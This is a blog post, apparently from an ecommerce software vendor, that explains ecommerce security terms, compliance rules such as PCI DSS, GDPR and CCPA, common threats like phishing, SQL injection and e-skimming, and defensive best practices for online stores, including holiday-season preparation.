Ecommerce sites will always be a hot target for cyberattacks. For would-be thieves, they are treasure troves of personal and financial data. In addition to this, for businesses of all sizes, the cost of a breach both in loss of data and in customer trust can be hugely damaging.
Ecommerce business owners are all too aware of these issues and are increasing their security measures. The VMWare Carbon Black 2020 Cybersecurity Outlook Report found that 77% of businesses surveyed had purchased new security products in the last year and 69% had increased security staff.
In this constant game of cat and mouse, as online retailers add increasingly innovative technologies to their sites to stay competitive, cyber attackers are equally honing their skills and finding new vulnerabilities to exploit. The best way to stay ahead is to be aware of ecommerce security best practices and the types of attacks to be on the lookout for.
What is Ecommerce Security?
The frequency and sophistication of cyber-attacks have skyrocketed in recent years. Ecommerce security refers to the measures taken to protect your business and your customers against cyber threats.
1. Payment Card Industry Data Security Standard (PCI DSS).
PCI DSS (often referred to as just “PCI”) is an industry-standard that ensures credit card information collected online is being transmitted and stored securely.
2. International Organisation for Standardisation (ISO).
ISO is an international standard-setting body that creates requirements that guide businesses in making sure their products and processes are fit for purpose. One of their standards, ISO/IEC 27001:2013, covers data security. Achieving this certification means a business has high-quality management systems, data security, risk-aversion strategies, and standardised business practices.
3. Personal Data.
Personal data or personal information refers to any data that can be linked back to a specific individual. At its most simple, this includes names, email addresses, and phone numbers, but it can get a little bit more complex as well. Any data set — even scrubbed of specific names or numbers — that can identify a particular person is considered personal data. Protecting personal data is particularly important when it comes to data privacy regulations like GDPR (more on that later).
4. Transport Layer Security (TLS), Secure Sockets Layer (SSL), and HTTPS authentication.
Utilising SSL helps to authenticate and encrypt links between networked computers. Once you have an SSL certificate for your ecommerce site, you can move from HTTP to HTTPS, which serves as a trust signal to customers that your site is secure.
5. Multi-factor authentication (MFA), 2-factor authentication (2FA), or 2-step verification (2SV).
MFA, 2FA, and 2SV are sometimes used interchangeably — and they are similar — but there are differences between them. In addition to entering a username and password, all three of these methods require at least one further method of identity verification of a user logging into a site — like your ecommerce store.
Here’s a high-level explanation of the differences:
- 2SV may require the user to enter a one-time code, delivered via an email, text message, or phone call
- 2FA goes a step further and may require the user to acknowledge their login attempt through another device, like opening a specific app on a mobile device while logging in from a laptop
- MFA is similar to 2FA but can refer to the implementation of more than two factors of authentication
6. Distributed Denial of Service (DDoS).
A DDoS attack refers to a disruption of server, service, or network traffic by overwhelming it with a flood of traffic. This resource on Cloudflare, which offers more detailed information on DDoS attacks, compares it to a traffic jam. Imagine trying to pull out into a major roadway (those are your customers and legitimate traffic) during rush hour — all those cars are the compromised traffic, blocking customers out of your store.
7. Malware and ransomware.
Malware, or “malicious software”, is software that attackers install on your system. Ransomware is a type of Malware that locks the victim out of their system or prevents access to data until a ransom is paid to the attacker. Here are a few symptoms you may experience if your system becomes infected:
- Links take you to the wrong page destination
- New toolbars or buttons appear in your browser, or new icons show up on your desktop
- You experience a near-constant barrage of ad pop-ups
- Your system is slow or repeatedly crashes, or your browser freezes frequently and becomes unresponsive
- Your emails keep bouncing
What is Compliance, and How is it Different From Security?
The concepts of compliance and cybersecurity are often used interchangeably — and in some ways, they are related, but there are some important differences.
Compliance refers to the ability to meet a specific set of standards set out by governments or private institutions, and there can be legal repercussions for not complying. However, meeting those compliance standards does not necessarily mean your ecommerce site is fully secure. Note that there are many compliance standards that your business may be required to meet. We are only discussing several of the major, cybersecurity-related regulations.
1. Payment Card Industry Data Security Standard (PCI-DSS).
Any business that manages credit card transactions must comply with the PCI-DSS requirements around the protection of cardholder data, no matter their revenue or credit card transaction volumes. These data security standards are defined by the PCI Security Standards Council (PCI SSC) and enforced by credit card companies.
2. General Data Protection Regulation (GDPR).
GDPR is a relatively recent law enacted in the European Union to ensure the protection of European Economic Area (EEA) citizens’ data and privacy. It doesn’t just apply to businesses in the EU; if you sell products internationally to any of these citizens, you will need to comply with GDPR as you handle any of their data.
3. California Consumer Privacy Act (CCPA).
After GDPR was implemented in the EU, the state of California began to move toward implementing its data protection law. The deadline for businesses working with or employing California residents to comply with CCPA was January 1, 2020. The spirit of CCPA is similar to GDPR in that it is dedicated to protecting the data and privacy of private citizens, but there are a few important differences. While this is the most recent and farthest-reaching data protection standard in the US, at least 15 other states have some type of personal privacy or data protection standards.
The Biggest Security Threats to Your Ecommerce Site
The types and methods of cyber attacks are broad and varied, and it would be almost impossible to delve into them all in one blog post. But some rise to the top as the most important to know about for strong ecommerce security.
1. Phishing.
Phishing is a type of social engineering and refers to methods used by attackers to trick victims — typically via email, text, or phone — into providing private information like passwords, account numbers, social security numbers, and more.
2. Malware and ransomware.
When your device or network becomes infected with malware or ransomware — a type of malware — you may be locked out of all your important data and systems. Downtime is expensive, but regular backups of your site data can help keep this from being a devastating blow to your business. By not clicking on suspicious links or installing unknown software on a computer, you can be better protected against attacks.
3. SQL injection.
You may be at risk if your ecommerce site insecurely stores data in a SQL database. If not properly validated, a malicious query injected into a packaged payload can give the attacker access to view and even manipulate any information in a database.
4. Cross-site scripting (XSS).
XSS involves inserting a piece of malicious code (typically JavaScript) into a webpage. Unlike some other kinds of attacks, this one doesn’t impact the site itself, but it would impact the users of that page — i.e., your shoppers — exposing them to malware, phishing attempts, and more.
5. E-skimming.
E-skimming refers to a method of stealing credit card information and personal data from payment card processing pages on ecommerce sites. Attackers gain access to your site either via a successful phishing attempt, brute force attack, XSS, or third-party compromise, then capture in real time the payment information your shoppers enter into the checkout page.
Best Practices for Ecommerce Security
The compliance standards mentioned above aren’t going away. Trends in privacy concerns indicate that we should expect more regulations in the future as people of all ages are increasingly concerned with where their data is going.
Payment information is shown to be the prominent target, and ecommerce attacks continue to rise as point-of-sale breaches and card skimmers are, overall, declining. If a security breach of your ecommerce site leads to a loss of customer data, the associated fines — and the hit to your brand reputation — could be devastating.
1. Implement strong, unique passwords — and help make sure your customers do, too.
According to the 2020 Verizon Data Breach Investigations Report, 37% of credential theft breaches used stolen or weak credentials. It’s worth the extra effort to make sure you, your employees, and your customers implement good practices for strong passwords:
- Strong passwords are at least eight characters and contain upper and lowercase letters, numbers, and symbols
- Passwords should never be shared — each user should have his or her own unique, private username and password for login
- Never use the same password for other login credentials as you use for your ecommerce site.
- Consider using a password manager
- Never publicly share sensitive information like your date of birth, social security number, or any other info you may use as answers to security questions
2. Protect your devices.
Whether you’ve got one computer in a home office or a headquarters with a full networked computer system, make sure your connected devices are cyber-secure with antivirus software, firewalls, or another appropriate method of protecting against threats.
3. Steel against social engineering attempts.
One of the best ways to avoid malware infections is to avoid falling into the phishing traps. Never provide any level of personal information unless you have verified the identity of the recipient. Additionally, no legitimate organisation will ever ask you to share your password.
Never click links in suspicious emails, as they may take you to a webpage that is made to look like a familiar login page but serves instead to steal your information. Also, do not ever download any attachments that you were not already expecting.
There are a few ways to distinguish phishing attempts from legitimate emails; here’s what to look for:
- Obvious spelling and grammatical mistakes in the subject line or body of an email could indicate a suspicious sender
- Look closely at the domain of the email sender. They are often made to look like a familiar domain but are off by just one letter (e.g., SwiftERM.com could become SwiftEERM.com)
- The same goes for any URLs you might click. At first glance, they may appear legitimate, but the spelling could be off by one letter in the hopes you don’t notice and click anyway, through to a dangerous domain
- Suspicious emails may ask you to do something like transfer money or authorise a charge, and offer an excuse for why it must be done immediately
4. Implement additional authentication factors.
It may feel like a burden at times, but using 2-step verification, 2-factor authentication, or multi-factor authentication gives you further assurance that you and your authorised users are the only people logging into your store. Considering the potential consequences of a breach, it’s worth it.
5. Only store the customer data that you need.
When it comes to storing data, the bottom line is to never hold on to more than you need to optimally conduct your business. However, in deciding what exactly that means for you, there are a lot of factors to consider.
Particularly with the growing number of data privacy regulations, it’s important to carefully establish your own business philosophy to balance customer experience, business convenience, and security.
Always keep your customers’ critical data separate from other information by segmenting your network. Deploy firewalls and conduct audits to ensure that all of your security measures are functioning the way they are supposed to.
6. Make sure your site is always up to date.
Security is a continuous cat-and-mouse game. Attackers identify vulnerabilities; software engineers patch them. If you are using a SaaS ecommerce platform, updates to your software are taken care of automatically. With on-premises ecommerce solutions, however, your business is responsible for implementing any updates, bug fixes, or vulnerability patches to the software that powers your store.
With our previous ecommerce platform, there were ongoing security updates that we had to manually install which would always “break” something else. We had to create a secondary sandbox site to test security updates before uploading to our live site. As you can imagine, this was not ideal.
7. Switch to HTTPS.
Secure HTTPS hosting, which requires an SSL certificate, will help secure your website. It’s also a boon for your marketing department because Google penalises websites with HTTP in organic search rankings. HTTPS sends a positive trust signal to your shoppers — particularly the digitally savvy.
8. Back up your data.
If you are breached and lose access to your data, you are going to want a backup to help you get your business back up and running as quickly as possible.
9. Regularly review all plugins and third-party integrations.
Take an inventory of all the third-party solutions you’re running within your store. Make sure that you know what they are and assess your continued level of trust in that third party. If you’re no longer using them, remove that integration from your store. The idea is to allow the smallest number of parties to have access to your customers’ data, while still driving your business forward.
Double Down on Security During the Holiday Season
The holiday season is, unfortunately, a time when you can expect higher volumes of attempted fraud and cybercrime. Everyone is busy, and there are huge spikes in traffic on ecommerce sites, making anomalous behaviour more difficult to protect. Attackers know this — and see it as an opportunity.
Here are some things you can do to ensure website security through the holidays:
1. Do a pre-holiday security check.
The holiday season is the time when a good majority of ecommerce cyber-attacks take place, taking advantage of the holiday rush. Retailers should prepare for this in advance and conduct a thorough security check before the holiday season starts. This should include checking for malware in point-of-sale systems and improving the security of web servers.
Your holiday security audit should also include an examination of who has access to what:
Make sure to review admin-level accounts and privileges for your store, marketing software, and other tools. Disable or delete unused accounts. Update permissions to reflect the actual workflows for particular users.
2. Increase your fraud protection.
A steep spike in shoppers is often accompanied by an increase in fraudulent activity. According to the TransUnion Holiday Retail Fraud Survey from 2019, 46% of customers are concerned about being the victim of fraud when shopping this holiday season.
Another form of cyber risk and one of the biggest risks to ecommerce brands today is the chargeback scam. Attackers acquire credit card information along with credentials and go on a spending spree. The retailer gets an order and ships it, not thinking twice about it. Only to receive a chargeback at some point in the future because the charge was marked as fraud. The retailer can’t argue and is forced to refund the order and the goods are long gone. This is even compounded more with loyalty programs and gift cards.
3. Prepare your customer service team.
Make sure you and your team are prepared for common threats — including having a clear process for verifying the identity of customers who request any changes to their orders or accounts.
4. Have a security update plan.
It’s good advice to get your store pretty much locked down for the holidays and not make too many changes to it, just to avoid the extra risk that that can entail. However, that general guideline does not apply when it comes to security, and patching your site for any vulnerabilities. This is mostly applicable if you have an on-premise ecommerce solution. You need to have a tried and true plan for site updates if they become necessary to ensure the security of your business and your shoppers.
Conclusion
Developing good ecommerce security is vitally important to the success of your business. You can’t afford to lose your customers’ trust by exposing their data. By using a SaaS platform, you get the benefits of spending more time growing your business — and less time worrying about security monitoring and maintenance.
This doesn’t mean there’s nothing for you to do! Practising good password hygiene, staying mindful about clicking links and downloading attachments from your email, and regularly reviewing your third-party integrations are particularly important.
By following the tips in this post and staying aware of what’s happening in the cybersecurity landscape, you can provide your customers with a shopping experience they can trust.